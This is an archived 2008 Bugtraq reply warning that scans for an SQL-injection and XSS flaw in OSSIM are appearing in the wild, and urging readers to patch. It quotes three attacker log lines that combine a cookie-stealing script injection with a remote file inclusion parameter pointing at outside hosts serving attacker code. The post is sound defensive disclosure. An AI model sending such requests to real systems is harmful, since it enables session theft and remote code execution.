lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080225144645.31993.qmail@securityfocus.com>
Date: 25 Feb 2008 14:46:45 -0000
From: dcid@...ec.net
To: bugtraq@...urityfocus.com
Subject: Re: Re: SQL-injection, XSS in OSSIM (Open Source Security
 Information Management)

Hi list,

I am seeing scans for this in the "wild" now... As Dominique said, I don't know who would open up their SIM to the world, but better apply the patch
soon.

222.239.78.91 - - [22/Feb/2008:17:24:48 -0300] "GET /wiki//ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 200 6792 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"

195.189.85.162 - - [23/Feb/2008:12:04:55 -0300] "GET /wiki/index.php//ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 200 6605 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"

61.19.38.155 - - [23/Feb/2008:14:07:28 -0300] "GET //ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://h1.ripway.com/durhaka/cmdasca.txt????? HTTP/1.1" 200 6891 "-" "libwww-perl/5.803"


Thanks,

--
Daniel B. Cid
dcid ( at ) ossec.net

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ